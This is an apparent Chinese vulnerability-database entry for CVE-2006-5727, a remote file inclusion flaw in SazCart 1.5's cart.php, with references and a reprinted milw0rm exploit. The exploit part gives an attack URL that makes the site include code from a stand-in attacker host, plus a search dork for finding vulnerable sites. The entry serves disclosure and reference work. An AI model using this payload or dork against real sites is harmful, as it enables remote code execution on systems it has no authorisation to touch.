SazCart CART.PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111455 漏洞类型 输入验证
发布时间 2006-11-04 更新时间 2006-11-07
CVE编号 CVE-2006-5727 CNNVD-ID CNNVD-200611-074
漏洞平台 PHP CVSS评分 5.1
|漏洞来源
https://www.exploit-db.com/exploits/2718
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200611-074
|漏洞详情
sazcart中的admin/controls/cart.php存在PHP远程文件包含漏洞,远程攻击者可以通过(1)_saz[settings][shippingfolder]和(2)_saz[settings][taxfolder]参数来执行任意PHP代码。
|漏洞EXP
sazcart v1.5 (cart.php) Remote File include
*********************---Hitamputih crew---******************************** 
* Bug Found By : IbnuSina
* vendor : http://sazcart.com/site
*Risk    : High
* Greetz : *Solpot,permenhack,barbarosa,cah|gemblunkz,fung_men,setiawan,irvian,meteoroid
* and all member hitamputih crew community www.kaipank.org/forum
*especially thx to str0ke@milw0rm.com 
***************************************************************************
bug found on admin/controls/cart.php
include($_saz['settings']['shippingfolder'] . "/shipping.php");
$Shipping = new Shipping;
include($_saz['settings']['taxfolder'] . "/tax.php");
$Tax = new Tax;

exploit :
http://sitename.com/[sazcart PATH]/admin/controls/cart.php?_saz[settings][shippingfolder]=HTTP://EVILCODE?
google dork: "powered by sazcart"

# milw0rm.com [2006-11-04]
|参考资料

来源:VUPEN
名称:ADV-2006-4343
链接:http://www.frsirt.com/english/advisories/2006/4343
来源:SECUNIA
名称:22708
链接:http://secunia.com/advisories/22708
来源:MILW0RM
名称:2718
链接:http://milw0rm.com/exploits/2718
来源:XF
名称:sazcart-cart-file-include(30013)
链接:http://xforce.iss.net/xforce/xfdb/30013
来源:BID
名称:20922
链接:http://www.securityfocus.com/bid/20922
来源:BUGTRAQ
名称:20070109sazcartv1.5(cart.php)RemoteFileinclude
链接:http://www.securityfocus.com/archive/1/archive/1/456542/100/0/threaded
来源:OSVDB
名称:30194
链接:http://www.osvdb.org/30194
来源:VIM
名称:20070110Vulnerable:sazcartv1.5(cart.php)RemoteFileinclude
链接:http://www.attrition.org/pipermail/vim/2007-January/001232.html